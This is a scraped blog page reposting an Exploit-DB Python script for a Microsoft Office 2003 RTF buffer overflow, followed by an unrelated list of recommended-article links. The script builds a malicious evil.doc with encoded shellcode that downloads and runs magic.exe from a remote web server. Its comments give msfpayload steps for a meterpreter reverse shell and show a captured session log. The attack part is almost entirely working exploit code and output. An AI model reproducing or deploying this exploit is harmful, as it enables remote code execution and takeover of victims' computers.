yatere
yatere

Microsoft Office 2003 Home/Pro 0day

#!/usr/bin/python
#
# Note from the Exploit-DB team: This might be the same bug as:
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb
#
#-----------------------------------------------------------------------------------#
# Exploit: Microsoft Office 2003 Home/Pro 0day - Tested on XP SP1,2.3               #
# Authors: b33f (Ruben Boonen) && g11tch (Chris Hodges)                             #
#####################################################################################
# One shellcode to rule them all, One shellcode to find them, One shellcode to      #
# bring them all and in the darkness bind them!!                                    #
#                                                                                   #
# Greetings: offsec, corelan, setoolkit                                             #
#####################################################################################
# (1) root@bt:~/Desktop/office# ./office2003.py                                     #
#     root@bt:~/Desktop/office# mv evil.doc /var/www/                               #
#                                                                                   #
# (2) msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=9988 X #
#     > /var/www/magic.exe                                                          #
#                                                                                   #
# (3) msf  exploit(handler) > exploit                                               #
#                                                                                   #
#    [*] Started reverse handler on 192.168.111.132:9988                            #
#    [*] Starting the payload handler...                                            #
#    [*] Sending stage (752128 bytes) to 192.168.111.128                            #
#    [*] Meterpreter session 1 opened (192.168.111.132:9988 -> 192.168.111.128:1073)#
#        at 2012-01-08 18:46:26 +0800                                               #
#                                                                                   #
#    meterpreter > ipconfig                                                         #
#                                                                                   #
#    MS TCP Loopback interface                                                      #
#    Hardware MAC: 00:00:00:00:00:00                                                #
#    IP Address  : 127.0.0.1                                                        #
#    Netmask     : 255.0.0.0                                                        #
#                                                                                   #
#   AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport               #
#   Hardware MAC: 00:0c:29:6c:92:42                                                 #
#   IP Address  : 192.168.111.128                                                   #
#   Netmask     : 255.255.255.0                                                     #
#-----------------------------------------------------------------------------------#
import binascii
filename = "evil.doc"
#-----------------------------------------------------------------------------------#
# File Structure                                                                    #
#-----------------------------------------------------------------------------------#
file = (
"{\\rt##{\shp{\sp}}{\shp{\sp}}{\shp{\sp}}{\shp{\*\shpinst\shpfhdr0\shpbxcolumn\s"
"hpbypara\sh pwr2}{\sp{\sn {}{}{\sn}{\sn}{\*\*}pFragments}{\*\*\*}{\sv{\*\*\*\*\*"
"\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*}9;2;ffffffffff")
#-----------------------------------------------------------------------------------#
# Open raw socket to download payload to parent directory as "a.exe"                #
# ==> cmd execute "a.exe"                                                           #
#-----------------------------------------------------------------------------------#
magic = (
"\x65\x62\x37\x37\x33\x31\x63\x39\x36\x34\x38\x62\x37\x31\x33\x30"
"\x38\x62\x37\x36\x30\x63\x38\x62\x37\x36\x31\x63\x38\x62\x35\x65"
"\x30\x38\x38\x62\x37\x65\x32\x30\x38\x62\x33\x36\x36\x36\x33\x39"
"\x34\x66\x31\x38\x37\x35\x66\x32\x63\x33\x36\x30\x38\x62\x36\x63"
"\x32\x34\x32\x34\x38\x62\x34\x35\x33\x63\x38\x62\x35\x34\x30\x35"
"\x37\x38\x30\x31\x65\x61\x38\x62\x34\x61\x31\x38\x38\x62\x35\x61"
"\x32\x30\x30\x31\x65\x62\x65\x33\x33\x34\x34\x39\x38\x62\x33\x34"
"\x38\x62\x30\x31\x65\x65\x33\x31\x66\x66\x33\x31\x63\x30\x66\x63"
"\x61\x63\x38\x34\x63\x30\x37\x34\x30\x37\x63\x31\x63\x66\x30\x64"
"\x30\x31\x63\x37\x65\x62\x66\x34\x33\x62\x37\x63\x32\x34\x32\x38"
"\x37\x35\x65\x31\x38\x62\x35\x61\x32\x34\x30\x31\x65\x62\x36\x36"
"\x38\x62\x30\x63\x34\x62\x38\x62\x35\x61\x31\x63\x30\x31\x65\x62"
"\x38\x62\x30\x34\x38\x62\x30\x31\x65\x38\x38\x39\x34\x34\x32\x34"
"\x31\x63\x36\x31\x63\x33\x65\x38\x39\x32\x66\x66\x66\x66\x66\x66"
"\x35\x66\x38\x31\x65\x66\x39\x38\x66\x66\x66\x66\x66\x66\x65\x62"
"\x30\x35\x65\x38\x65\x64\x66\x66\x66\x66\x66\x66\x36\x38\x38\x65"
"\x34\x65\x30\x65\x65\x63\x35\x33\x65\x38\x39\x34\x66\x66\x66\x66"
"\x66\x66\x33\x31\x63\x39\x36\x36\x62\x39\x36\x66\x36\x65\x35\x31"
"\x36\x38\x37\x35\x37\x32\x36\x63\x36\x64\x35\x34\x66\x66\x64\x30"
"\x36\x38\x33\x36\x31\x61\x32\x66\x37\x30\x35\x30\x65\x38\x37\x61"
"\x66\x66\x66\x66\x66\x66\x33\x31\x63\x39\x35\x31\x35\x31\x38\x64"
"\x33\x37\x38\x31\x63\x36\x65\x65\x66\x66\x66\x66\x66\x66\x38\x64"
"\x35\x36\x30\x63\x35\x32\x35\x37\x35\x31\x66\x66\x64\x30\x36\x38"
"\x39\x38\x66\x65\x38\x61\x30\x65\x35\x33\x65\x38\x35\x62\x66\x66"
"\x66\x66\x66\x66\x34\x31\x35\x31\x35\x36\x66\x66\x64\x30\x36\x38"
"\x37\x65\x64\x38\x65\x32\x37\x33\x35\x33\x65\x38\x34\x62\x66\x66"
"\x66\x66\x66\x66\x66\x66\x64\x30\x36\x33\x36\x64\x36\x34\x32\x65"
"\x36\x35\x37\x38\x36\x35\x32\x30\x32\x66\x36\x33\x32\x30\x32\x30"
"\x36\x31\x32\x65\x36\x35\x37\x38\x36\x35\x30\x30")
#------------------------------------------------------------------------------------------------------------------------------#
# Two versions of office 2003 floating around:                                                                                 #
# (1) Standalone version, (2) XP Service Pack upgrade                                                                          #
################################################################################################################################
# Unfortunatly though the exploit works perfectly for both versions they require different pointers to ESP...                  #
#                                                                                                                              #
# (1) 0x30324366 - CALL ESP - WINWORD.exe => "\x36\x36\x34\x33\x33\x32\x33\x30"                                                #
# => http://download.microsoft.com/download/6/2/3/6233A257-16BD-4C8D-BF4C-6FA59AF9213A/OfficeSTD.exe                           #
#                                                                                                                              #
# (2) 0x30402655 - PUSH ESP -> RETN - WINWORD.exe => "\x35\x35\x32\x36\x34\x30\x33\x30"                                        #
# => http://download.microsoft.com/download/7/7/8/778493c2-ace3-44c5-8bc3-d102da80e0f6/Office2003SP3-KB923618-FullFile-ENU.exe #
#------------------------------------------------------------------------------------------------------------------------------#
EIP = "\x36\x36\x34\x33\x33\x32\x33\x30" #should ascii convert the Little Endian pointer
filler = "\x30\x30\x30\x30\x38\x30\x37\x63"*2 + "\x41"*24 + "\x39\x30"*18
buffer = "\x23"*501 + "\x30\x35" + "\x30"*40 + EIP + filler + magic
#-----------------------------------------------------------------------------------#
# Since we are downloading our payload from a remote webserver there are no         #
# restrictions on payload size or badcharacters...                                  #
#-----------------------------------------------------------------------------------#
URL = "http://192.168.111.132/magic.exe"
binnu = binascii.b2a_hex(URL)
URL2 = "00"
nxt="{}}}}}}"
nxt+="\x0d\x0a"
nxt+="}"
textfile = open(filename , 'w')
textfile.write(file+buffer+binnu+URL2+nxt)
textfile.close()

你可能感兴趣的:(Microsoft Office 2003 Home/Pro 0day)

  • ubuntu软件 白云千载尽 ubuntulinux运维c++vscode
    视频软件,大部分的编码都能适应sudoaptinstallvlc图片软件sudoaptinstallgwenview截图软件sudoaptinstallflameshot设置快捷键flameshotflameshotgui-p/home/cyun/Pictures/flameshot也就是把它保存到一个自定义的路径菜单更换sudoaptremovenautilus-extension-gnome-
  • Python连接数据库汇总(二) xinxiyinhe pythonpython数据库开发语言
    以下是Python调用其他数据库的代码示例:1.MicrosoftSQLServer#安装库:pipinstallpyodbcimportpyodbc#连接数据库conn=pyodbc.connect('DRIVER={ODBCDriver17forSQLServer};''SERVER=localhost;''DATABASE=test_db;''UID=sa;''PWD=your_passwo
  • C语言标准 Thomas_TangShiMing c语言开发语言
    演进历史:C语言是为了开发Unix系统而创建的,一开始,并没有形成所谓的C标准,C语言最初的开发者是DennisM.Ritchie和KennethLaneThompson。1973年,Unix系统的核心正式采用C语言改写。1987年,BrianW.Kernighan/DennisM.Ritchie合著的《TheCProgrammingLanguage》第一版是公认的C标准,通常称为K&RC或经典C
  • 【Python实用教学篇】手把手4步教会你用Python连接数据库! 田野猫咪 数据库python开发语言
    一,打开数据库(Mysql)服务二,用Sqlyog(回复yog获取sqlyog工具使用方法)连接自己要测试的数据库,创建测试用数据库和表三,打开PyCharm,(python开发2.*版本可以直接使用MySQL,python3.*版本需要下载使用PyMySQL包才能连接数据库),按照下图方法安装PyMySql包1.ctrl+alt+s调出设置面板,选择project下的pythoninterpre
  • 【过大的压力如何限制人类潜能:神经科学与认知心理学的深度解析】 调皮的芋头 神经网络人工智能机器学习数据库
    过大的压力如何限制人类潜能:神经科学与认知心理学的深度解析一、神经生化机制:压力激素的认知锁链皮质醇风暴的神经毒性持续高压下,下丘脑-垂体-肾上腺轴(HPA轴)过度激活,导致皮质醇浓度突破临界阈值(>20μg/dL)。该激素通过以下途径摧毁认知基础:海马体萎缩:抑制脑源性神经营养因子(BDNF)生成,使海马神经再生速率降低40%(Sapolsky,2003)前额叶皮层失活:阻断谷氨酸能传递,导致执
  • 网络编程--协议、协议族、地址族 SNAKEpc12138 C++#网络编程网络网络协议
    写在前面这里先介绍下socket函数(Windows版本)的函数声明,后续内容均围绕该声明展开:#include//af:指定该套接字的协议族//type:指定该套接字的数据传输方式//protocol:指定该套接字的最终协议//返回值:失败返回INVALID_SOCKET,否则为成功SOCKETsocket(intaf,inttype,intprotocol);协议和协议族协议:协议就是为了完成
  • 浅谈React的Diff算法,简单易懂! 赵小左 前端javascript开发语言react.jsdiff算法
    react16之前,主要是通过递归遍历Vdom树来查找不同。对有变化的部分重新生成真实的DOM。在react16之后,则是引入了新的架构Fiber架构,在Reconciler(协调器)中会进行Diff算法。流程如下:第一次渲染的时候,不进行diff,而是直接将vdom转成Fiber,在内存中构workInProgressFiber树,构建完成之后用它来替换currenFiber,再去通知渲染器进行
  • 求助各位大佬,Preparing metadata (pyproject.toml) ... error如何解决 m0_67130860 python
    Installingbuilddependencies...doneGettingrequirementstobuildwheel...donePreparingmetadata(pyproject.toml)...errorerror:subprocess-exited-with-error×Preparingmetadata(pyproject.toml)didnotrunsuccessful
  • 《React 属性与状态江湖:从验证到表单受控的实战探险》 贩卖纯净水. React前端javascript开发语言react.js
    属性初识属性能解决两个大问题:通信和复用props.js:importReact,{Component}from'react'importNavbarfrom'./Navbar'exportdefaultclassAppextendsComponent{state={a:100}render(){return(首页列表购物车)}}index.js:importReact,{Component}fr
  • JVM类加载 zhujilisa javajvm
    JVM类加载类加载类加载器类加载加载:查找并加载类的字节码文件验证:确保加载的字节码是合法且符合JVM规范准备:给类的静态变量分配内存,并赋默认值解析:符号引用替换为直接引用初始化:静态变量赋值,执行静态代码块类加载器引导类加载器(BootstrapClassLoader):加载JVM核心类库(如rt.jar中的类),位于JAVA_HOME/lib目录下扩展类加载器(ExtClassLoader)
  • mt4j android,Brainstorming und Mind-Mapping im Multi-Device-Kontext. Konzeption und prototypische Im... Oxygenfia mt4jandroid
    摘要:DievorliegendeArbeitbeschreibtdieKonzeptionundprototypischeImplementierungeinerAnwendungzurelektronischenUnterstützungvonBrainstorming-undMind-Mapping-SitzungenaneinemmultitouchfhigenTabletopmitSma
  • 存储优化(protobuf与mmkv) Ya-Jun androidkotlin
    存储优化(protobuf与mmkv)在Android应用开发中,数据存储是一个基础且关键的环节。随着应用功能的日益复杂,数据量的增加,传统的存储方式如SharedPreferences、SQLite等在性能上的局限性逐渐显现。本文将深入探讨两种高效的存储优化方案:ProtocolBuffers(protobuf)和MMKV,帮助开发者构建更高效、更可靠的数据存储系统。一、传统存储方式的局限性在讨
  • 【前端】【nuxt】几种在 Nuxt 客户端使用console的方式 患得患失949 Nuxt面试考题专栏(前后端)前端Nuxtconsole.log客户端
    方法1:在Vue生命周期钩子中使用只在客户端执行的钩子(如mounted)中打印:exportdefault{mounted(){console.log('仅在客户端显示',this.$route.path)}}方法2:通过环境判断使用process.client判断当前环境:if(process.client){console.log('客户端环境变量:',process.env.NODE_EN
  • pnpm安装报错 魏时烟 工作日志npm前端node.js
    mac安装pnpm成功,查看版本报错pnpm:commandnotfound执行命令//查看npm默认安装路径npmconfiggetprefix//1.新建一个全局安装的路径mkdir~/.npm-global//2.配置npm使用新的路径npmconfigsetprefix'~/.npm-global'//3.打开或者新建~/.profile,(vi~/.profile)加入下面一行expor
  • android系统架构的前世今生,超强Android进阶路线知识图谱 m0_64319298 程序员面试android移动开发
    4.Android专有的驱动程序除了上面这些不同点之外,最重要的是,为了突出android特性,支持android设备,Android还对Linux设备驱动进行了增强,主要如下所示。1)AndroidBinder基于OpenBinder框架的一个驱动,用于提供Android平台的进程间通信(InterProcessCommunication,IPC)功能。源代码位于drivers/staging/
  • SOAP和REST的区别 dev.null 网络网络
    SOAP(SimpleObjectAccessProtocol)和REST(RepresentationalStateTransfer)是两种用于构建Web服务的架构风格,它们的主要区别如下:1.协议与架构SOAP:是一种基于XML的协议,使用标准消息格式进行通信,通常依赖HTTP、SMTP、TCP等传输协议。REST:是一种架构风格,而不是协议,它基于HTTP协议并使用其标准的GET、POST、
  • [特殊字符] Elasticsearch 双剑合璧:HTTP API 与 Java API 实战整合指南 周小闯 elasticsearch项目实战elasticsearchhttpjava
    Elasticsearch双剑合璧:HTTPAPI与JavaAPI实战整合指南一、HTTPAPI定义与用途Elasticsearch的HTTPAPI是基于RESTful接口设计的核心交互方式,支持通过URL和JSON数据直接操作索引、文档、集群等资源。适用于快速调试、脚本调用和跨语言集成。1.索引管理(1)创建索引(指定分片与映射)PUT/products{"settings":{"number_
  • 关闭iterm2中对于行数的限制 你的微笑像拥抱 工具
    iTerm2默认的行数限制,超过1000的部分就被隐藏不显示了。处理方式:打开Preferences窗口,点击Profiles,右侧点击Terminal,在Scrollbackline右边勾选Ulimitedscrollback。
  • 【机械视觉】C#+VisionPro联合编程———【五、硬币检测小项目实现(C#+VisionPro联合编程和csv文件格式操作)】 _Csharp c#开发语言
    【机械视觉】C#+VisionPro联合编程———【五、硬币检测小项目实现(C#+VisionPro联合编程和csv文件格式操作)】项目介绍总共有十二张检测的图片,当点击检测按钮时检测当前展示的图片并且将检测效果展示在表格中,当点击上一页或下一页时换检测图片,点击保存本地时通过csv文件格式将表格数据保存,当下一次运行时将数据读取出来并且展示在表格中。此项目通过异步进行优化,在加载时改变了以往卡顿
  • 全局引用scss文件定义的变量 魏时烟 vue3+ts+scssscss前端css
    在vite.config.ts文件中写如下代码css:{preprocessorOptions:{scss:{additionalData:`@use"@/assets/styles/index.scss";`,//这一句javascriptEnabled:true}}}在scss文件中定义变量$color:#000;在其他文件引用变量.text{color:index.$color;}
  • 大语言模型(LLM)的微调与应用 AI Echoes 语言模型人工智能自然语言处理
    一、微调与应用的核心区别目标差异微调(Fine-tuning):针对预训练模型进行参数调整,使其适应特定任务或领域(如医疗问答、法律文本分析)。需通过有监督微调(SFT)或低秩适配(LoRA)等技术优化模型权重。应用(Application):基于现有模型的能力构建实际系统(如智能客服、文档摘要),侧重于工程化集成和交互设计,通常不修改模型参数,而是通过Prompt工程、RAG(检索增强生成)或A
  • 【C++】Operator Overloading bryant_meng C/C++c++开发语言运算符重载重载规则友元函数
    《C++程序设计基础教程》——刘厚泉,李政伟,二零一三年九月版,学习笔记文章目录1、什么是运算符重载2、运算符重载规则3、运算符重载的实现形式3.1、重载为类的成员函数3.2、重载为友元函数4、应用实例更多有趣的代码示例,可参考【Programming】1、什么是运算符重载在C++中,运算符重载是一种允许程序员为用户定义的类型(如类和结构体)指定如何使用标准运算符(如+,-,*,/,==,>等)的
  • Windows编译tiny-cuda-nn时出现fatal error C1083: “crtdefs.h”: No such file or directory 龙雪zzZ windowstiny-cuda-nn
    首先确保安装了VisualStudio其次有可能是因为安装的VS设置的编译项默认为x86,与当前系统的CUDA的位数不一致。如果你的电脑为x64,可以尝试先运行以下命令(路径自行更改)再进行编译:"YOUR_DIR/MicrosoftVisualStudio/20xx/Community/VC/Auxiliary/Build/vcvarsall.bat"x64然后运行编译命令,如使用pip安装:p
  • Solana合约的错误处理 GTokenTool发币平台 区块链
    错误处理Solana合约开发中错误处理是一个重要的部分,它帮助开发者和用户理解合约执行过程中发生的问题。Solana使用Rust编程语言开发智能合约(称为程序),并提供了一套丰富的错误处理机制,其中包括定义和使用错误类型。在合约开发中,我们需要返回ProgramResult类型,其定义为:rustuse{std::{result::ResultasResultGeneric,},};pubtype
  • 前端 - uniapp - - 滚动容器scroll-view实现横向滚动 cv高级工程师YKY uniapp前端uni-app
    微信开放平台scrol-view的官方文档说明https://developers.weixin.qq.com/miniprogram/dev/component/scroll-view.htmlscrollview相当于给div加上了overflow-x:auto;属性想要实现横线滚动官方文档有说明需要配置scroll-x和enable-flex为true并其需要给高度和flex-directi
  • Nginx正向代理HTTPS配置指南(仅供参考) 他不爱吃香菜 运维httpnginxhttps网络网络协议信息与通信tcp/ip
    要使用Nginx作为正向代理访问HTTPS网站,需通过CONNECT方法建立隧道。以下是操作详细步骤:1.安装Nginx及依赖模块需要模块:ngx_http_proxy_connect_module(支持CONNECT方法)。安装方式:需重新编译Nginx。bash复制#下载Nginx源码和模块wgethttp://nginx.org/download/nginx-1.24.0.tar.gztar
  • VUE中出现多个页面的样式冲突问题 JAVA叶知秋 vue.js前端javascript
    1.使用Vuescoped样式隔离在标签添加scoped属性,自动生成唯一属性选择器实现样式隔离:.container{/*仅当前页面生效*/}注:H5端通过scoped实现隔离,小程序/APP端通过自动转换类名实现132.自定义页面专属标识在根元素添加页面ID,通过层级选择器限定作用域:.page-home.container{/*仅限当前页面*/}3.类名命名规范采用页面名-元素的BEM命名法
  • Vue响应式数组方法深度解析 北辰alk 前端vuevue.jsjavascriptecmascript
    文章目录一、Vue数组响应式核心机制1.原生JavaScript数组的局限性2.Vue的解决方案二、Vue封装的七大数组方法1.方法列表与功能说明2.方法拦截器实现原理三、视图更新触发全流程1.依赖收集流程2.更新触发流程四、源码级实现分析1.原型链覆盖实现2.新增元素响应式处理五、特殊场景处理方案1.索引直接修改问题2.长度修改处理3.过滤数组处理六、Vue3的响应式数组优化1.Proxy实现机
  • Maven-工作原理详解 凡尘技术 Javamavenjava
    文章目录概述Maven的工作机制Maven中的坐标说明坐标的向量的取值方式坐标和仓库中jar包的存储路径之间的对应关系命令深入POM含义模型化思想思想落地POM文件详解POM的四个层次超级POM父POM有效POMPOM中属性的声明和引用help插件的各个目标help:evaluate访问系统属性help:evaluate访问环境变量help:evaluate访问project属性help:eval
  • ROS+YOLOV8+SLAM智能小车导航实战(三、Astra Pro深度相机节点+Astra Pro普通color颜色节点) 智慧愚行 YOLO机器人自动驾驶
    一、开始创建ROS节点空间mkdiryolov8_ros/src-pcdyolov8_ros/srccd..catkin_make如果报以下错误是因为系统中存在多个python环境解决办法首先查看你本机有多少个python版本,然后你conda版本的python位置在那里找到后替换调/usr/bin/python:查看本机中的python版本位置都有那些which-apython3catkin_m
  • 戴尔笔记本win8系统改装win7系统 sophia天雪 win7戴尔改装系统win8
    戴尔win8 系统改装win7 系统详述 第一步:使用U盘制作虚拟光驱:         1)下载安装UltraISO:注册码可以在网上搜索。         2)启动UltraISO,点击“文件”—》“打开”按钮,打开已经准备好的ISO镜像文
  • BeanUtils.copyProperties使用笔记 bylijinnan java
    BeanUtils.copyProperties VS PropertyUtils.copyProperties 两者最大的区别是: BeanUtils.copyProperties会进行类型转换,而PropertyUtils.copyProperties不会。 既然进行了类型转换,那BeanUtils.copyProperties的速度比不上PropertyUtils.copyProp
  • MyEclipse中文乱码问题 0624chenhong MyEclipse
    一、设置新建常见文件的默认编码格式,也就是文件保存的格式。 在不对MyEclipse进行设置的时候,默认保存文件的编码,一般跟简体中文操作系统(如windows2000,windowsXP)的编码一致,即GBK。 在简体中文系统下,ANSI 编码代表 GBK编码;在日文操作系统下,ANSI 编码代表 JIS 编码。 Window-->Preferences-->General -
  • 发送邮件 不懂事的小屁孩 send email
    import org.apache.commons.mail.EmailAttachment; import org.apache.commons.mail.EmailException; import org.apache.commons.mail.HtmlEmail; import org.apache.commons.mail.MultiPartEmail;
  • 动画合集 换个号韩国红果果 htmlcss
    动画 指一种样式变为另一种样式 keyframes应当始终定义0 100 过程 1 transition  制作鼠标滑过图片时的放大效果 css .wrap{ width: 340px;height: 340px; position: absolute; top: 30%; left: 20%; overflow: hidden; bor
  • 网络最常见的攻击方式竟然是SQL注入 蓝儿唯美 sql注入
    NTT研究表明,尽管SQL注入(SQLi)型攻击记录详尽且为人熟知,但目前网络应用程序仍然是SQLi攻击的重灾区。 信息安全和风险管理公司NTTCom Security发布的《2015全球智能威胁风险报告》表明,目前黑客攻击网络应用程序方式中最流行的,要数SQLi攻击。报告对去年发生的60亿攻击 行为进行分析,指出SQLi攻击是最常见的网络应用程序攻击方式。全球网络应用程序攻击中,SQLi攻击占
  • java笔记2 a-john java
    类的封装: 1,java中,对象就是一个封装体。封装是把对象的属性和服务结合成一个独立的的单位。并尽可能隐藏对象的内部细节(尤其是私有数据) 2,目的:使对象以外的部分不能随意存取对象的内部数据(如属性),从而使软件错误能够局部化,减少差错和排错的难度。 3,简单来说,“隐藏属性、方法或实现细节的过程”称为——封装。 4,封装的特性:       4.1设置
  • [Andengine]Error:can't creat bitmap form path “gfx/xxx.xxx” aijuans 学习Android遇到的错误
            最开始遇到这个错误是很早以前了,以前也没注意,只当是一个不理解的bug,因为所有的texture,textureregion都没有问题,但是就是提示错误。 昨天和美工要图片,本来是要背景透明的png格式,可是她却给了我一个jpg的。说明了之后她说没法改,因为没有png这个保存选项。 我就看了一下,和她要了psd的文件,还好我有一点
  • 自己写的一个繁体到简体的转换程序 asialee java转换繁体filter简体
              今天调研一个任务,基于java的filter实现繁体到简体的转换,于是写了一个demo,给各位博友奉上,欢迎批评指正。          实现的思路是重载request的调取参数的几个方法,然后做下转换。          
  • android意图和意图监听器技术 百合不是茶 android显示意图隐式意图意图监听器
    Intent是在activity之间传递数据;Intent的传递分为显示传递和隐式传递   显式意图:调用Intent.setComponent() 或 Intent.setClassName() 或 Intent.setClass()方法明确指定了组件名的Intent为显式意图,显式意图明确指定了Intent应该传递给哪个组件。   隐式意图;不指明调用的名称,根据设
  • spring3中新增的@value注解 bijian1013 javaspring@Value
            在spring 3.0中,可以通过使用@value,对一些如xxx.properties文件中的文件,进行键值对的注入,例子如下: 1.首先在applicationContext.xml中加入:  <beans xmlns="http://www.springframework.
  • Jboss启用CXF日志 sunjing logjbossCXF
    1. 在standalone.xml配置文件中添加system-properties:     <system-properties>        <property name="org.apache.cxf.logging.enabled" value=&
  • 【Hadoop三】Centos7_x86_64部署Hadoop集群之编译Hadoop源代码 bit1129 centos
      编译必需的软件 Firebugs3.0.0 Maven3.2.3 Ant JDK1.7.0_67 protobuf-2.5.0 Hadoop 2.5.2源码包       Firebugs3.0.0   http://sourceforge.jp/projects/sfnet_findbug
  • struts2验证框架的使用和扩展 白糖_ 框架xmlbeanstruts正则表达式
    struts2能够对前台提交的表单数据进行输入有效性校验,通常有两种方式: 1、在Action类中通过validatexx方法验证,这种方式很简单,在此不再赘述; 2、通过编写xx-validation.xml文件执行表单验证,当用户提交表单请求后,struts会优先执行xml文件,如果校验不通过是不会让请求访问指定action的。 本文介绍一下struts2通过xml文件进行校验的方法并说
  • 记录-感悟 braveCS 感悟
    再翻翻以前写的感悟,有时会发现自己很幼稚,也会让自己找回初心。   2015-1-11 1. 能在工作之余学习感兴趣的东西已经很幸福了; 2. 要改变自己,不能这样一直在原来区域,要突破安全区舒适区,才能提高自己,往好的方面发展; 3. 多反省多思考;要会用工具,而不是变成工具的奴隶; 4. 一天内集中一个定长时间段看最新资讯和偏流式博
  • 编程之美-数组中最长递增子序列 bylijinnan 编程之美
    import java.util.Arrays; import java.util.Random; public class LongestAccendingSubSequence { /** * 编程之美 数组中最长递增子序列 * 书上的解法容易理解 * 另一方法书上没有提到的是,可以将数组排序(由小到大)得到新的数组, * 然后求排序后的数组与原数
  • 读书笔记5 chengxuyuancsdn 重复提交struts2的token验证
    1、重复提交 2、struts2的token验证 3、用response返回xml时的注意 1、重复提交 (1)应用场景 (1-1)点击提交按钮两次。 (1-2)使用浏览器后退按钮重复之前的操作,导致重复提交表单。 (1-3)刷新页面 (1-4)使用浏览器历史记录重复提交表单。 (1-5)浏览器重复的 HTTP 请求。 (2)解决方法 (2-1)禁掉提交按钮 (2-2)
  • [时空与探索]全球联合进行第二次费城实验的可能性 comsci
         二次世界大战前后,由爱因斯坦参加的一次在海军舰艇上进行的物理学实验 -费城实验   至今给我们大家留下很多迷团.....      关于费城实验的详细过程,大家可以在网络上搜索一下,我这里就不详细描述了      在这里,我的意思是,现在
  • easy connect 之 ORA-12154: TNS: 无法解析指定的连接标识符 daizj oracleORA-12154
    用easy connect连接出现“tns无法解析指定的连接标示符”的错误,如下: C:\Users\Administrator>sqlplus username/pwd@192.168.0.5:1521/orcl SQL*Plus: Release 10.2.0.1.0 – Production on 星期一 5月 21 18:16:20 2012 Copyright (c) 198
  • 简单排序:归并排序 dieslrae 归并排序
    public void mergeSort(int[] array){ int temp = array.length/2; if(temp == 0){ return; } int[] a = new int[temp]; int
  • C语言中字符串的\0和空格 dcj3sjt126com c
       \0 为字符串结束符,比如说:                       abcd (空格)cdefg; 存入数组时,空格作为一个字符占有一个字节的空间,我们
  • 解决Composer国内速度慢的办法 dcj3sjt126com Composer
    用法: 有两种方式启用本镜像服务: 1 将以下配置信息添加到 Composer 的配置文件 config.json 中(系统全局配置)。见“例1” 2 将以下配置信息添加到你的项目的 composer.json 文件中(针对单个项目配置)。见“例2” 为了避免安装包的时候都要执行两次查询,切记要添加禁用 packagist 的设置,如下 1 2 3 4 5
  • 高效可伸缩的结果缓存 shuizhaosi888 高效可伸缩的结果缓存
    /** * 要执行的算法,返回结果v */ public interface Computable<A, V> { public V comput(final A arg); }   /** * 用于缓存数据 */ public class Memoizer<A, V> implements Computable<A,
  • 三点定位的算法 haoningabc c算法
    三点定位, 已知a,b,c三个顶点的x,y坐标 和三个点都z坐标的距离,la,lb,lc 求z点的坐标 原理就是围绕a,b,c 三个点画圆,三个圆焦点的部分就是所求 但是,由于三个点的距离可能不准,不一定会有结果, 所以是三个圆环的焦点,环的宽度开始为0,没有取到则加1 运行 gcc -lm test.c test.c代码如下 #include "stdi
  • epoll使用详解 jimmee clinux服务端编程epoll
    epoll - I/O event notification facility在linux的网络编程中,很长的时间都在使用select来做事件触发。在linux新的内核中,有了一种替换它的机制,就是epoll。相比于select,epoll最大的好处在于它不会随着监听fd数目的增长而降低效率。因为在内核中的select实现中,它是采用轮询来处理的,轮询的fd数目越多,自然耗时越多。并且,在linu
  • Hibernate对Enum的映射的基本使用方法 linzx0212 enumHibernate
      枚举   /** * 性别枚举 */ public enum Gender { MALE(0), FEMALE(1), OTHER(2); private Gender(int i) { this.i = i; } private int i; public int getI
  • 第10章 高级事件(下) onestopweb 事件
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • 孙子兵法 roadrunners 孙子兵法
    始计第一 孙子曰: 兵者,国之大事,死生之地,存亡之道,不可不察也。 故经之以五事,校之以计,而索其情:一曰道,二曰天,三曰地,四曰将,五 曰法。道者,令民于上同意,可与之死,可与之生,而不危也;天者,阴阳、寒暑 、时制也;地者,远近、险易、广狭、死生也;将者,智、信、仁、勇、严也;法 者,曲制、官道、主用也。凡此五者,将莫不闻,知之者胜,不知之者不胜。故校 之以计,而索其情,曰
  • MySQL双向复制 tomcat_oracle mysql
    本文包括: 主机配置 从机配置 建立主-从复制 建立双向复制   背景 按照以下简单的步骤: 参考一下: 在机器A配置主机(192.168.1.30) 在机器B配置从机(192.168.1.29) 我们可以使用下面的步骤来实现这一点   步骤1:机器A设置主机 在主机中打开配置文件 ,
  • zoj 3822 Domination(dp) 阿尔萨斯 Mina
    题目链接:zoj 3822 Domination 题目大意:给定一个N∗M的棋盘,每次任选一个位置放置一枚棋子,直到每行每列上都至少有一枚棋子,问放置棋子个数的期望。 解题思路:大白书上概率那一张有一道类似的题目,但是因为时间比较久了,还是稍微想了一下。dp[i][j][k]表示i行j列上均有至少一枚棋子,并且消耗k步的概率(k≤i∗j),因为放置在i+1~n上等价与放在i+1行上,同理
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他